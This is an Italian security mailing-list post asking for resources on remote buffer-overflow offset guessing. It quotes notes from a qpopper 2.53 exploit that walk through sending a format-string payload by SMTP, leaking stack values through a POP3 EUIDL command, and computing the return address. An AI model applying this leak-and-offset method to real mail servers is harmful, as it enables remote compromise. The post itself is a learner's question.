remote offset guessing

Ciao a tutti,
sto cercando di documentarmi sull'exploiting degli overflow da remoto, ma
soprattutto sulle tecniche di acquisizione degli offset "giusti" sempre da remoto...
Finora l'unica cosa interessante che ho trovato e' questa (nelle note di un
exploit per qpopper):

 * to aquire the offsets for an unknown version of QPOP 2.53 you have to have
 * a POP-able account on the target system.
 *
 * do as follows:
 *
 * telnet smtp-server-for-target.target.com 25
 *
 * 220 smtp-server-for-target.target.com ready.
 * MAIL FROM: <>
 * 250 <<>> ... Sender Okay
 * RCPT TO: <targetuser@target.com>
 * 250 <targetuser@target.com> ... Recipient Okay
 * DATA
 * 354 Enter mail, end with "." on a line by itself
 * Subject: footest
 * From: %08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
 * .
 * 250 Mail accepted
 * QUIT
 * 221 smtp-server-for-target.target.com closing connection
 *
 * now login via POP3:
 *
 * telnet pop.target.com 110
 *
 * +OK QPOP (version 2.53) at pop.target.com starting.
 * USER targetuser
 * +OK Password required for targetuser.
 * PASS passbla
 * +OK targetuser has 1 messages (1141 octets).
 * EUIDL 1
 * +OK 2 54a955db49a7de403d100a67618fee20 455
 * bfffd3c0.080505f1.bfffd3c0.000001c7.08052306.bfffdbd8.08054b6c.080518d4.
 *
 *                                              ^^^^^^^^
 * this is the POP pointer.
 * the return address is POP pointer minus 0x08b0
 *
 * pop_pointer = 0xbfffdbd8 - 0x08b0 = 0xbfffd328

Chiunque puo' indirizzarmi verso docs utili all'approfondimento 
(sulle tecniche piu' usate, sul calcolo degli offset, etc.) batta un colpo.

Saluti,
David Coppa <coffeec (at) tin.it>
fingerprint = 849F 801C CA74 F451 CB69  EB67 BB3B 92DC E183 7616
GnuPG pubkey: finger caffeine@unix-shells.com | gpg --import
// Happiness is a hard disk

________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List